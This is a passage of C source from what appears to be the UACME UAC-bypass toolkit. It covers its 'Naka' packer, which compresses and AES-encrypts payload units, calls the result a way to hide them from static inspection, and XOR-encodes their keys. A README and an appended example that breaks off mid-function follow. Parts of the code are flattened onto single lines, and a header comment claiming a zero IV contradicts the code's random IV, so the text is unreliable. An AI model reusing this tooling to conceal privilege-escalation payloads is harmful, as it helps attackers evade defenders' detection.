        // Hash buffer allocation.
        //
        cbResult = 0;
        if (!NT_SUCCESS(BCryptGetProperty(
            hAlgSha256,
            BCRYPT_HASH_LENGTH,
            (PUCHAR)&_cbHash,
            sizeof(DWORD),
            &cbResult,
            0)))
        {
            break;
        }

        _pbHash = (PBYTE)HeapAlloc(hHeap, HEAP_ZERO_MEMORY, _cbHash);
        if (_pbHash == NULL)
            break;

        //
        // Create hash from buffer.
        //
        if (!NT_SUCCESS(BCryptCreateHash(
            hAlgSha256,
            &hHashSha256,
            pbKeyObject,
            cbKeyObject,
            NULL,
            0,
            0)))
        {
            break;
        }

        if (!NT_SUCCESS(BCryptHashData(
            hHashSha256,
            (PUCHAR)pbBuffer,
            (ULONG)cbBuffer,
            0)))
        {
            break;
        }

        if (!NT_SUCCESS(BCryptFinishHash(
            hHashSha256,
            _pbHash,
            _cbHash,
            0)))
        {
            break;
        }

        BCryptDestroyHash(hHashSha256);
        hHashSha256 = NULL;
        BCryptCloseAlgorithmProvider(hAlgSha256, 0);
        hAlgSha256 = NULL;
        HeapFree(hHeap, 0, pbKeyObject);
        pbKeyObject = NULL;

        *pbHash = _pbHash;
        *pcbHash = _cbHash;
        bResult = TRUE;

    } while (FALSE);

    if (hHashSha256) BCryptDestroyHash(hHashSha256);
    if (hAlgSha256) BCryptCloseAlgorithmProvider(hAlgSha256, 0);
    if (pbKeyObject) HeapFree(hHeap, 0, pbKeyObject);

    if (bResult == FALSE) {
        *pbHash = NULL;
        *pcbHash = 0;
        if (_pbHash) HeapFree(hHeap, 0, _pbHash);
    }

    return bResult;
}

/*
* GenerateIV
*
* Purpose:
*
* Crypto-random generated initialization vector for AES encryption.
*
*/
BOOL GenerateIV(
    _Out_writes_bytes_all_(cbIV) PBYTE pbIV,
    _In_ DWORD cbIV
)
{
    BOOL bResult = FALSE;
    BCRYPT_ALG_HANDLE hAlgRng = NULL;

    do {
        if (!NT_SUCCESS(BCryptOpenAlgorithmProvider(
            &hAlgRng,
            BCRYPT_RNG_ALGORITHM,
            NULL,
            0)))
        {
            break;
        }

        bResult = (NT_SUCCESS(BCryptGenRandom(
            hAlgRng,
            pbIV,
            cbIV,
            0)));

    } while (FALSE);

    if (hAlgRng) BCryptCloseAlgorithmProvider(hAlgRng, 0);

    return bResult;
}

/*
* DecryptBuffer
*
* Purpose:
*
* Decrypt AES encrypted buffer.
*
*/
BOOL DecryptBuffer(
    _In_ PBYTE pbBuffer,
    _In_ DWORD cbBuffer,
    _In_ PBYTE pbIV,
    _In_ PBYTE pbSecret,
    _In_ DWORD cbSecret,
    _Out_ PBYTE *pbDecryptedBuffer,
    _Out_ PDWORD pcbDecryptedBuffer
)
{
    BOOL bResult = FALSE;
    BCRYPT_ALG_HANDLE hAlgAes = NULL;
    BCRYPT_KEY_HANDLE hKey = NULL;
    HANDLE heapCNG = NULL;
    DWORD cbCipherData, cbKeyObject, cbResult, cbBlockLen;
    PBYTE pbKeyObject = NULL, pbCipherData = NULL;

    do {
        //
        // Private heap for the CNG key object; destroyed on exit.
        //
        heapCNG = HeapCreate(0, 0, 0);
        if (heapCNG == NULL)
            break;

        if (!NT_SUCCESS(BCryptOpenAlgorithmProvider(
            &hAlgAes,
            BCRYPT_AES_ALGORITHM,
            NULL,
            0)))
        {
            break;
        }

        cbKeyObject = 0;
        cbResult = 0;
        if (!NT_SUCCESS(BCryptGetProperty(
            hAlgAes,
            BCRYPT_OBJECT_LENGTH,
            (PUCHAR)&cbKeyObject,
            sizeof(DWORD),
            &cbResult,
            0)))
        {
            break;
        }

        pbKeyObject = (PBYTE)HeapAlloc(heapCNG, HEAP_ZERO_MEMORY, cbKeyObject);
        if (pbKeyObject == NULL)
            break;

        cbBlockLen = 0;
        if (!NT_SUCCESS(BCryptGetProperty(hAlgAes,
            BCRYPT_BLOCK_LENGTH,
            (PUCHAR)&cbBlockLen,
            sizeof(DWORD),
            &cbResult,
            0)))
        {
            break;
        }

        if (cbBlockLen > DCU_IV_MAX_BLOCK_LENGTH)
            break;

        //
        // Chaining mode is left at the provider default, which is CBC for the
        // Microsoft Primitive Provider and matches what EncryptBuffer sets explicitly.
        //
        if (!NT_SUCCESS(BCryptGenerateSymmetricKey(
            hAlgAes,
            &hKey,
            pbKeyObject,
            cbKeyObject,
            pbSecret,
            cbSecret,
            0)))
        {
            break;
        }

        //
        // First call only sizes the output buffer, second call decrypts.
        //
        cbCipherData = 0;
        if (!NT_SUCCESS(BCryptDecrypt(
            hKey,
            pbBuffer,
            cbBuffer,
            NULL,
            pbIV,
            cbBlockLen,
            NULL,
            0,
            &cbCipherData,
            BCRYPT_BLOCK_PADDING)))
        {
            break;
        }

        pbCipherData = (PBYTE)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, cbCipherData);
        if (pbCipherData == NULL) {
            break;
        }

        cbResult = 0;
        if (!NT_SUCCESS(BCryptDecrypt(
            hKey,
            pbBuffer,
            cbBuffer,
            NULL,
            pbIV,
            cbBlockLen,
            pbCipherData,
            cbCipherData,
            &cbResult,
            BCRYPT_BLOCK_PADDING)))
        {
            break;
        }

        BCryptDestroyKey(hKey);
        hKey = NULL;

        //
        // Report the plaintext length with block padding removed, not the
        // size of the allocation.
        //
        *pbDecryptedBuffer = pbCipherData;
        *pcbDecryptedBuffer = cbResult;
        bResult = TRUE;

    } while (FALSE);

    if (hKey != NULL) BCryptDestroyKey(hKey);
    if (hAlgAes != NULL) BCryptCloseAlgorithmProvider(hAlgAes, 0);
    if (heapCNG) HeapDestroy(heapCNG);

    if (bResult == FALSE) {
        if (pbCipherData) {
            HeapFree(GetProcessHeap(), 0, pbCipherData);
        }
        *pbDecryptedBuffer = NULL;
        *pcbDecryptedBuffer = 0;
    }

    return bResult;
}

/*
* EncryptBuffer
*
* Purpose:
*
* Encrypt given buffer with AES-CBC.
*
*/
BOOL EncryptBuffer(
    _In_ PBYTE pbBuffer,
    _In_ DWORD cbBuffer,
    _Inout_ PBYTE pbIV,
    _In_ PBYTE pbSecret,
    _In_ DWORD cbSecret,
    _Out_ PBYTE *pbEncryptedBuffer,
    _Out_ PDWORD pcbEncryptedBuffer
)
{
    BOOL bResult = FALSE;
    BCRYPT_ALG_HANDLE hAlgAes = NULL;
    BCRYPT_KEY_HANDLE hKey = NULL;
    HANDLE heapCNG = NULL;
    DWORD cbCipherData, cbObject, cbResult, cbBlockLen;
    PBYTE pbObject, pbCipherData = NULL, _pbIV;

    do {
        heapCNG = HeapCreate(0, 0, 0);
        if (heapCNG == NULL)
            break;

        if (!NT_SUCCESS(BCryptOpenAlgorithmProvider(
            &hAlgAes,
            BCRYPT_AES_ALGORITHM,
            NULL,
            0)))
        {
            break;
        }

        cbObject = 0;
        cbResult = 0;
        if (!NT_SUCCESS(BCryptGetProperty(
            hAlgAes,
            BCRYPT_OBJECT_LENGTH,
            (PUCHAR)&cbObject,
            sizeof(DWORD),
            &cbResult,
            0)))
        {
            break;
        }

        pbObject = (PBYTE)HeapAlloc(heapCNG, HEAP_ZERO_MEMORY, cbObject);
        if (pbObject == NULL)
            break;

        cbBlockLen = 0;
        if (!NT_SUCCESS(BCryptGetProperty(hAlgAes,
            BCRYPT_BLOCK_LENGTH,
            (PUCHAR)&cbBlockLen,
            sizeof(DWORD),
            &cbResult,
            0)))
        {
            break;
        }

        if (cbBlockLen > DCU_IV_MAX_BLOCK_LENGTH)
            break;

        //
        // A fresh random IV is returned to the caller in pbIV (it is stored in
        // the container header). BCryptEncrypt advances the IV in place while
        // it works, so it gets a private copy.
        //
        if (!GenerateIV(pbIV, cbBlockLen))
            break;

        _pbIV = (PBYTE)HeapAlloc(heapCNG, HEAP_ZERO_MEMORY, cbBlockLen);
        if (_pbIV == NULL)
            break;

        RtlCopyMemory(_pbIV, pbIV, cbBlockLen);

        if (!NT_SUCCESS(BCryptSetProperty( //-V542
            hAlgAes,
            BCRYPT_CHAINING_MODE,
            (PUCHAR)BCRYPT_CHAIN_MODE_CBC,
            sizeof(BCRYPT_CHAIN_MODE_CBC),
            0)))
        {
            break;
        }

        if (!NT_SUCCESS(BCryptGenerateSymmetricKey(
            hAlgAes,
            &hKey,
            pbObject,
            cbObject,
            pbSecret,
            cbSecret,
            0)))
        {
            break;
        }

        //
        // First call only sizes the output buffer, second call encrypts.
        //
        cbCipherData = 0;
        if (!NT_SUCCESS(BCryptEncrypt(
            hKey,
            pbBuffer,
            cbBuffer,
            NULL,
            _pbIV,
            cbBlockLen,
            NULL,
            0,
            &cbCipherData,
            BCRYPT_BLOCK_PADDING)))
        {
            break;
        }

        pbCipherData = (PBYTE)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, cbCipherData);
        if (pbCipherData == NULL) {
            break;
        }

        cbResult = 0;
        if (!NT_SUCCESS(BCryptEncrypt(
            hKey,
            pbBuffer,
            cbBuffer,
            NULL,
            _pbIV,
            cbBlockLen,
            pbCipherData,
            cbCipherData,
            &cbResult,
            BCRYPT_BLOCK_PADDING)))
        {
            break;
        }

        BCryptDestroyKey(hKey);
        hKey = NULL;

        *pbEncryptedBuffer = pbCipherData;
        *pcbEncryptedBuffer = cbCipherData;
        bResult = TRUE;

    } while (FALSE);

    if (hKey != NULL) BCryptDestroyKey(hKey);
    if (hAlgAes != NULL) BCryptCloseAlgorithmProvider(hAlgAes, 0);
    if (heapCNG) {
        HeapDestroy(heapCNG);
    }

    if (bResult == FALSE) {
        if (pbCipherData) HeapFree(GetProcessHeap(), 0, pbCipherData);
        *pbEncryptedBuffer = NULL;
        *pcbEncryptedBuffer = 0;
    }

    return bResult;
}

/*
* supWriteBufferToFile
*
* Purpose:
*
* Create new file and write buffer to it.
*
*/
BOOL supWriteBufferToFile(
    _In_ LPWSTR lpFileName,
    _In_ PVOID Buffer,
    _In_ DWORD BufferSize
)
{
    HANDLE hFile;
    DWORD bytesIO = 0; // stays 0 if WriteFile fails

    if (Buffer == NULL || BufferSize == 0)
        return FALSE;

    hFile = CreateFileW(lpFileName,
        GENERIC_WRITE,
        0,
        NULL,
        CREATE_ALWAYS,
        0,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        return FALSE;
    }

    WriteFile(hFile, Buffer, BufferSize, &bytesIO, NULL);
    CloseHandle(hFile);

    return (bytesIO == BufferSize);
}

/*
* supReadBufferFromFile
*
* Purpose:
*
* Open existing file and read from it to buffer.
*
*/
PVOID supReadBufferFromFile(
    _In_ LPWSTR lpFileName,
    _Out_ PLARGE_INTEGER FileSize
)
{
    BOOL bSuccess = FALSE;
    DWORD r = 0;
    PVOID FileData = NULL;
    HANDLE hFile = INVALID_HANDLE_VALUE;
    LARGE_INTEGER fileSize;

    do {
        hFile = CreateFile(
            lpFileName,
            GENERIC_READ,
            FILE_SHARE_READ,
            NULL,
            OPEN_EXISTING,
            0,
            NULL);

        if (hFile != INVALID_HANDLE_VALUE) {

            fileSize.QuadPart = 0;
            if (!GetFileSizeEx(hFile, &fileSize))
                break;

            if (fileSize.QuadPart == 0)
                break;

            //
            // Only the low 32 bits are used below; refuse anything larger.
            //
            if (fileSize.HighPart != 0)
                break;

            FileData = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (SIZE_T)fileSize.LowPart);
            if (FileData == NULL)
                break;

            //
            // A short read is treated as failure.
            //
            if (!ReadFile(hFile, FileData, fileSize.LowPart, &r, NULL) ||
                (r != fileSize.LowPart))
            {
                HeapFree(GetProcessHeap(), 0, FileData);
                FileData = NULL;
                break;
            }

            if (FileSize)
                *FileSize = fileSize;

            bSuccess = TRUE;
        }

    } while (FALSE);

    if (!bSuccess) {
        if (FileSize) {
            fileSize.QuadPart = 0;
            *FileSize = fileSize;
        }
    }

    if (hFile != INVALID_HANDLE_VALUE)
        CloseHandle(hFile);

    return FileData;
}

/*
* IsValidContainerHeader
*
* Purpose:
*
* Basic sanity checks over container header.
*
*/
BOOL IsValidContainerHeader(
    _In_ PDCU_HEADER UnitHeader,
    _In_ DWORD FileSize
)
{
    DWORD HeaderCrc;

    __try {

        //
        // The file must at least hold a full header before any field is read.
        //
        if (FileSize < sizeof(DCU_HEADER))
            return FALSE;

        if ((UnitHeader->Magic != UACME_CONTAINER_PACKED_DATA) && //Naka
            (UnitHeader->Magic != UACME_CONTAINER_PACKED_UNIT) && //Naka
            (UnitHeader->Magic != UACME_CONTAINER_PACKED_CODE) && //Kuma
            (UnitHeader->Magic != UACME_CONTAINER_PACKED_KEYS))   //Kuma
        {
            return FALSE;
        }

        //
        // Note that IV has different meaning in Kuma containers.
        //

        //
        // Header CRC is computed over the header with the HeaderCrc field
        // itself zeroed. This is an integrity check only, not authentication.
        //
        HeaderCrc = UnitHeader->HeaderCrc;
        UnitHeader->HeaderCrc = 0;
        if (RtlComputeCrc32(0, UnitHeader, sizeof(DCU_HEADER)) != HeaderCrc)
            return FALSE;

        if ((UnitHeader->cbData == 0) || (UnitHeader->cbDeltaSize == 0))
            return FALSE;

        //
        // Encrypted data follows the header, so it must fit in the bytes
        // that remain after it.
        //
        if (UnitHeader->cbData > FileSize - sizeof(DCU_HEADER))
            return FALSE;

        if (UnitHeader->cbDeltaSize > FileSize)
            return FALSE;

        if (UnitHeader->cbDeltaSize > UnitHeader->cbData)
            return FALSE;

    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        return FALSE;
    }

    return TRUE;
}

/*
* DecompressContainerUnit
*
* Purpose:
*
* Decompress given container file.
*
*/
* */ void DecompressContainerUnit( _In_ LPWSTR lpInputFile, _In_ LPWSTR lpKeyFile ) { PUCHAR FileData = NULL; LPWSTR NewName = NULL; SIZE_T sz = 0; LARGE_INTEGER FileSize, KeyFileSize; PDCU_HEADER UnitHeader; PBYTE pbDecryptedBuffer = NULL; DWORD cbDecryptedBuffer = 0; DELTA_INPUT diDelta, diSource; DELTA_OUTPUT doOutput; HANDLE hHeap = GetProcessHeap(); PBYTE pbKeyBlob = NULL; PBYTE DataPtr; do { sz = (1 + _strlen(lpInputFile)) * sizeof(WCHAR); NewName = (LPWSTR)HeapAlloc(hHeap, HEAP_ZERO_MEMORY, sz); if (NewName == NULL) break; FileSize.QuadPart = 0; FileData = (PUCHAR)supReadBufferFromFile(lpInputFile, &FileSize); if ((FileData == NULL) || (FileSize.QuadPart == 0)) break; KeyFileSize.QuadPart = 0; pbKeyBlob = (PBYTE)supReadBufferFromFile(lpKeyFile, &KeyFileSize); if ((pbKeyBlob == NULL) || (KeyFileSize.QuadPart == 0)) break; UnitHeader = (PDCU_HEADER)FileData; if (!IsValidContainerHeader(UnitHeader, FileSize.LowPart)) break; DataPtr = (PBYTE)UnitHeader + sizeof(DCU_HEADER); if (!DecryptBuffer( (PBYTE)DataPtr, UnitHeader->cbData, UnitHeader->bIV, (PBYTE)pbKeyBlob, KeyFileSize.LowPart, &pbDecryptedBuffer, &cbDecryptedBuffer)) { break; } if (cbDecryptedBuffer > FileSize.LowPart) break; RtlSecureZeroMemory(&diSource, sizeof(DELTA_INPUT)); RtlSecureZeroMemory(&diDelta, sizeof(DELTA_INPUT)); RtlSecureZeroMemory(&doOutput, sizeof(DELTA_OUTPUT)); diDelta.Editable = FALSE; diDelta.lpcStart = pbDecryptedBuffer; diDelta.uSize = UnitHeader->cbDeltaSize; if (ApplyDeltaB(DELTA_FILE_TYPE_RAW, diSource, diDelta, &doOutput)) { if (_filename_noext(NewName, lpInputFile)) { _strcat(NewName, TEXT(".out")); supWriteBufferToFile(NewName, doOutput.lpStart, (DWORD)doOutput.uSize); } DeltaFree(doOutput.lpStart); } } while (FALSE); if (pbDecryptedBuffer != NULL) HeapFree(hHeap, 0, pbDecryptedBuffer); if (NewName != NULL) HeapFree(hHeap, 0, NewName); if (FileData != NULL) HeapFree(hHeap, 0, FileData); if (pbKeyBlob != NULL) HeapFree(hHeap, 0, pbKeyBlob); } /* * CreateContainerPackedUnit * 
* Purpose: * * Create container with compressed file inside. * */ void CreateContainerPackedUnit( _In_ LPWSTR lpInputFile ) { PUCHAR FileData = NULL; HANDLE hHeap = GetProcessHeap(); LPWSTR NewName = NULL; SIZE_T sz = 0; LARGE_INTEGER FileSize; DELTA_INPUT d_in, d_target, s_op, t_op, g_op; DELTA_OUTPUT d_out; PBYTE pbHash = NULL, pbEncryptedBuffer = NULL; DWORD cbHash = 0, cbEncryptedBuffer = 0; PDCU_HEADER UnitHeader; PIMAGE_NT_HEADERS NtHeaders; PIMAGE_FILE_HEADER fheader; PVOID hashSource; DWORD hashSize, Magic; PBYTE DataPtr; #ifdef _DEBUG LPWSTR KeyName = NULL; #endif BYTE bIV[DCU_IV_MAX_BLOCK_LENGTH]; do { RtlSecureZeroMemory(&d_out, sizeof(DELTA_OUTPUT)); sz = (1 + _strlen(lpInputFile)) * sizeof(WCHAR); NewName = (LPWSTR)HeapAlloc(hHeap, HEAP_ZERO_MEMORY, sz); if (NewName == NULL) break; #ifdef _DEBUG KeyName = (LPWSTR)HeapAlloc(hHeap, HEAP_ZERO_MEMORY, sz); if (KeyName == NULL) break; #endif FileSize.QuadPart = 0; FileData = (PUCHAR)supReadBufferFromFile(lpInputFile, &FileSize); if ((FileData == NULL) || (FileSize.QuadPart == 0)) break; NtHeaders = RtlImageNtHeader(FileData); if (NtHeaders == NULL) { // // Not an image file, use whole file SHA256 hash as key. // hashSource = FileData; hashSize = FileSize.LowPart; Magic = UACME_CONTAINER_PACKED_DATA; } else { // // Image file, create SHA256 hash from IMAGE_FILE_HEADER. // fheader = &NtHeaders->FileHeader; hashSource = fheader; hashSize = sizeof(IMAGE_FILE_HEADER); Magic = UACME_CONTAINER_PACKED_UNIT; } if (!CreateSha256HashForBuffer((PBYTE)hashSource, hashSize, &pbHash, &cbHash)) break; if (cbHash > 32) break; if (_filename_noext(NewName, lpInputFile)) { _strcat(NewName, TEXT(".key")); supWriteBufferToFile(NewName, pbHash, (DWORD)cbHash); } // // Pack file to buffer. 
// RtlSecureZeroMemory(&d_in, sizeof(DELTA_INPUT)); d_target.lpcStart = FileData; d_target.uSize = FileSize.LowPart; d_target.Editable = FALSE; RtlSecureZeroMemory(&s_op, sizeof(DELTA_INPUT)); RtlSecureZeroMemory(&t_op, sizeof(DELTA_INPUT)); RtlSecureZeroMemory(&g_op, sizeof(DELTA_INPUT)); if (!CreateDeltaB(DELTA_FILE_TYPE_RAW, DELTA_FLAG_NONE, DELTA_FLAG_NONE, d_in, d_target, s_op, t_op, g_op, NULL, 0, &d_out)) { break; } // // Encrypt buffer with AES-CBC using SHA256 hash as key. // RtlSecureZeroMemory(&bIV, sizeof(bIV)); if (!EncryptBuffer( (PBYTE)d_out.lpStart, (DWORD)d_out.uSize, (PBYTE)&bIV, pbHash, cbHash, &pbEncryptedBuffer, &cbEncryptedBuffer)) { break; } DeltaFree(d_out.lpStart); d_out.lpStart = NULL; // // Build final package and save it to disk. // sz = sizeof(DCU_HEADER) + cbEncryptedBuffer; UnitHeader = (PDCU_HEADER)HeapAlloc( hHeap, HEAP_ZERO_MEMORY, sz); if (UnitHeader) { UnitHeader->Magic = Magic; UnitHeader->cbData = cbEncryptedBuffer; UnitHeader->cbDeltaSize = (DWORD)d_out.uSize; //original compressed delta size RtlCopyMemory(UnitHeader->bIV, bIV, DCU_IV_MAX_BLOCK_LENGTH); UnitHeader->HeaderCrc = RtlComputeCrc32(0, UnitHeader, sizeof(DCU_HEADER)); DataPtr = (PBYTE)UnitHeader + sizeof(DCU_HEADER); RtlCopyMemory(DataPtr, pbEncryptedBuffer, cbEncryptedBuffer); if (_filename_noext(NewName, lpInputFile)) { _strcat(NewName, TEXT(".cd")); supWriteBufferToFile(NewName, UnitHeader, (DWORD)sz); } HeapFree(GetProcessHeap(), 0, UnitHeader); } } while (FALSE); if (d_out.lpStart) DeltaFree(d_out.lpStart); if (pbHash) HeapFree(hHeap, 0, pbHash); if (pbEncryptedBuffer) HeapFree(hHeap, 0, pbEncryptedBuffer); #ifdef _DEBUG if (_filename_noext(NewName, lpInputFile)) { _strcat(NewName, TEXT(".cd")); if (_filename_noext(KeyName, lpInputFile)) { _strcat(KeyName, TEXT(".key")); DecompressContainerUnit(NewName, KeyName); } } if (KeyName != NULL) HeapFree(hHeap, 0, KeyName); #endif if (NewName != NULL) HeapFree(hHeap, 0, NewName); if (FileData != NULL) HeapFree(hHeap, 0, 
FileData); } #define UACME_KEY_SIZE 32 #define UACME_MAX_UNITS 12 //set actual number from github version #define AKAGI_XOR_KEY 'naka' typedef struct _DCK_HEADER { DWORD Id; BYTE Data[UACME_KEY_SIZE]; } DCK_HEADER, *PDCK_HEADER; /* * EncodeBuffer * * Purpose: * * Decrypt/Encrypt given buffer. * */ VOID EncodeBuffer( PVOID Buffer, ULONG BufferSize ) { ULONG k, c; PUCHAR ptr; if ((Buffer == NULL) || (BufferSize == 0)) return; k = AKAGI_XOR_KEY; c = BufferSize; ptr = (PUCHAR)Buffer; do { *ptr ^= k; k = _rotl(k, 1); ptr++; --c; } while (c != 0); } // // Keep in sync with Akagi // #define IDR_FUBUKI64 100 #define IDR_IKAZUCHI64 102 #define IDR_AKATSUKI64 103 #define IDR_KAMIKAZE64 104 #define IDR_FUBUKI32 200 #define IDR_IKAZUCHI32 202 #define IDR_KAMIKAZE 203 BOOL ProcessUnit( _In_ PWSTR UnitKeyName, _In_ ULONG UnitID, _In_ PDCK_HEADER UnitHeader) { PWCHAR pBuffer; LARGE_INTEGER fs; pBuffer = (PWCHAR)supReadBufferFromFile(UnitKeyName, &fs); if (pBuffer) { if (fs.LowPart != UACME_KEY_SIZE) { MessageBox( GetDesktopWindow(), L"Unexpected key size.", NULL, MB_ICONERROR); return FALSE; } UnitHeader->Id = UnitID; RtlCopyMemory(UnitHeader->Data, pBuffer, fs.LowPart); HeapFree(GetProcessHeap(), 0, pBuffer); } else { MessageBox( GetDesktopWindow(), L"File read error, memory not allocated.", NULL, MB_ICONERROR); return FALSE; } return TRUE; } VOID CreateSecretTables(VOID) { INT c = 0; SIZE_T l = 0; DCK_HEADER S[UACME_MAX_UNITS]; WCHAR szFileName[MAX_PATH * 2]; RtlSecureZeroMemory(szFileName, sizeof(szFileName)); #ifdef _DEBUG _strcpy(szFileName, L"Z:\\HE\\UACME\\Compress"); #else GetCurrentDirectory(MAX_PATH, szFileName); #endif _strcat(szFileName, L"\\"); l = _strlen(szFileName); szFileName[l] = 0; // // Build secrets64 // c = 0; RtlSecureZeroMemory(S, sizeof(S)); _strcat(&szFileName[l], L"Akatsuki64.key"); if (ProcessUnit(szFileName, IDR_AKATSUKI64, &S[c])) c++; szFileName[l] = 0; _strcat(&szFileName[l], L"Fubuki64.key"); if (ProcessUnit(szFileName, IDR_FUBUKI64, &S[c])) c++; 
szFileName[l] = 0; _strcat(&szFileName[l], L"Fubuki32.key"); if (ProcessUnit(szFileName, IDR_FUBUKI32, &S[c])) c++; szFileName[l] = 0; _strcat(&szFileName[l], L"Kamikaze.key"); if (ProcessUnit(szFileName, IDR_KAMIKAZE64, &S[c])) c++; EncodeBuffer(S, c * sizeof(DCK_HEADER)); szFileName[l] = 0; _strcat(&szFileName[l], L"secrets64.bin"); supWriteBufferToFile(szFileName, S, c * sizeof(DCK_HEADER)); // // Build secrets32 // c = 0; RtlSecureZeroMemory(S, sizeof(S)); szFileName[l] = 0; _strcat(&szFileName[l], L"Fubuki32.key"); if (ProcessUnit(szFileName, IDR_FUBUKI32, &S[c])) c++; szFileName[l] = 0; _strcat(&szFileName[l], L"Kamikaze.key"); if (ProcessUnit(szFileName, IDR_KAMIKAZE, &S[c])) c++; EncodeBuffer(S, c * sizeof(DCK_HEADER)); szFileName[l] = 0; _strcat(&szFileName[l], L"secrets32.bin"); supWriteBufferToFile(szFileName, S, c * sizeof(DCK_HEADER)); } /* * main * * Purpose: * * Program entry point. * */ void main() { LPWSTR FirstParam = NULL; LPWSTR *szArglist; INT nArgs = 0; szArglist = CommandLineToArgvW(GetCommandLineW(), &nArgs); if (szArglist) { if (nArgs > 1) { FirstParam = szArglist[1]; if (FirstParam) { if (_strcmpi(FirstParam, L"--stable") == 0) { CreateSecretTables(); } else { CreateContainerPackedUnit(FirstParam); } } } else { MessageBox( GetDesktopWindow(), TEXT("Input file not specified"), TEXT("Naka"), MB_ICONINFORMATION); } LocalFree(szArglist); } ExitProcess(0); } ================================================ FILE: Source/Naka/naka.h ================================================ /******************************************************************************* * * (C) COPYRIGHT AUTHORS, 2018 - 2021 * * TITLE: NAKA.H * * VERSION: 3.03 * * DATE: 15 July 2021 * * Common header file for Naka. * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A * PARTICULAR PURPOSE. 
*
*******************************************************************************/

#pragma once

#if !defined UNICODE
#error ANSI build is not supported
#endif

#include "shared\libinc.h"

#pragma comment(lib, "msdelta.lib")
#pragma comment(lib, "Bcrypt.lib")

//disable nonmeaningful warnings.
#pragma warning(disable: 4005) // macro redefinition
#pragma warning(disable: 4055) // %s : from data pointer %s to function pointer %s
#pragma warning(disable: 4152) // nonstandard extension, function/data pointer conversion in expression
#pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union
#pragma warning(disable: 6102) // Using %s from failed function call at line %u
#pragma warning(disable: 6320) // exception-filter expression is the constant EXCEPTION_EXECUTE_HANDLER

#include #include #include #include
#include "shared\ntos\ntos.h"
#include "shared\minirtl.h"
#include "shared\cmdline.h"
#include "shared\_filename.h"

#define UACME_CONTAINER_PACKED_UNIT 'UPCU' //Naka handling
#define UACME_CONTAINER_PACKED_DATA 'DPCU' //Naka handling
#define UACME_CONTAINER_PACKED_CODE 'CPCU' //Kuma handling
#define UACME_CONTAINER_PACKED_KEYS 'KPCU' //Kuma handling

//Initialization vector max bytes
#define DCU_IV_MAX_BLOCK_LENGTH 16

//
// Container layout: this header followed by cbData bytes of AES-CBC
// ciphertext. The key is the SHA256 of the packed unit itself (its
// IMAGE_FILE_HEADER for images, the whole file otherwise) and the IV is
// zero, so the container hides units from static inspection but is not
// a confidentiality boundary. HeaderCrc is a CRC32 of this structure
// taken with HeaderCrc = 0.
//
typedef struct _DCU_HEADER {
    DWORD Magic;
    DWORD cbData;
    DWORD cbDeltaSize;
    DWORD HeaderCrc;
    BYTE bIV[DCU_IV_MAX_BLOCK_LENGTH];
    //PBYTE pbData[1]; /* not a member of the structure */
} DCU_HEADER, *PDCU_HEADER;

================================================
FILE: Source/README.md
================================================
## Units

- Akagi, x64/x86-32 main executable file, contains payload/data units.
- Akatsuki, x64 payload, WOW64 logger.
- Fubuki, x64/x86-32 payload, general purpose.
- Kamikaze, data, MMC snap-in.
- Naka, x64/x86-32 compressor for other payload/data units.
- Yuubari, x64 UAC info data dumper.

## Other

- Shared, contains headers and source code shared between several projects.
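The DCU container format that Naka writes and IsValidContainerHeader checks, as an added example that is not UACME's code: a portable C mirror of DCU_HEADER with a bitwise CRC-32 standing in for RtlComputeCrc32 (same polynomial and seeding, so the values agree), a header builder, the same validation checks, and one check Naka does not make (that sizeof(header) + cbData actually fits in the file). Field names and magic values follow naka.h; crc32_ieee, dcu_build_header, dcu_validate, dcu_check_case and dcu_forge_demo are this example's own names. dcu_forge_demo makes the practitioner's point explicit: the CRC catches corruption, not tampering, because anyone who edits a field can recompute it.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Portable mirror of naka.h DCU_HEADER: 32 bytes, little-endian, no padding.
 * Magic values are the MSVC multi-character constants written out as integers. */
#define DCU_IV_MAX_BLOCK_LENGTH 16
#define UACME_CONTAINER_PACKED_UNIT 0x55504355u /* 'UPCU' */
#define UACME_CONTAINER_PACKED_DATA 0x44504355u /* 'DPCU' */
#define UACME_CONTAINER_PACKED_CODE 0x43504355u /* 'CPCU' */
#define UACME_CONTAINER_PACKED_KEYS 0x4B504355u /* 'KPCU' */

typedef struct dcu_header {
    uint32_t Magic;
    uint32_t cbData;       /* bytes of AES-CBC ciphertext following the header */
    uint32_t cbDeltaSize;  /* bytes of MsDelta stream inside the decrypted data */
    uint32_t HeaderCrc;    /* CRC-32 of this struct computed with HeaderCrc = 0 */
    uint8_t  bIV[DCU_IV_MAX_BLOCK_LENGTH];
} dcu_header;

/* Standard reflected CRC-32 (polynomial 0xEDB88320), bit by bit. With seed 0
 * it returns the same value RtlComputeCrc32(0, buf, len) does on Windows. */
uint32_t crc32_ieee(uint32_t seed, const void *buf, size_t len)
{
    const uint8_t *p = (const uint8_t *)buf;
    uint32_t crc = ~seed;
    for (size_t i = 0; i < len; i++) {
        crc ^= p[i];
        for (int b = 0; b < 8; b++)
            crc = (crc >> 1) ^ (0xEDB88320u & (0u - (crc & 1u)));
    }
    return ~crc;
}

/* CRC over a copy with HeaderCrc zeroed, so the caller's header is untouched
 * (Naka's IsValidContainerHeader zeroes the field in place instead). */
uint32_t dcu_header_crc(const dcu_header *h)
{
    dcu_header tmp;
    memcpy(&tmp, h, sizeof(tmp));
    tmp.HeaderCrc = 0;
    return crc32_ieee(0, &tmp, sizeof(tmp));
}

void dcu_build_header(dcu_header *h, uint32_t magic, uint32_t cbData,
                      uint32_t cbDeltaSize, const uint8_t iv[DCU_IV_MAX_BLOCK_LENGTH])
{
    memset(h, 0, sizeof(*h));
    h->Magic = magic;
    h->cbData = cbData;
    h->cbDeltaSize = cbDeltaSize;
    memcpy(h->bIV, iv, DCU_IV_MAX_BLOCK_LENGTH);
    h->HeaderCrc = dcu_header_crc(h);
}

/* The checks IsValidContainerHeader makes, plus one it omits: the ciphertext
 * must fit in the file after the header. Returns 1 when the header is accepted. */
int dcu_validate(const dcu_header *h, uint32_t fileSize)
{
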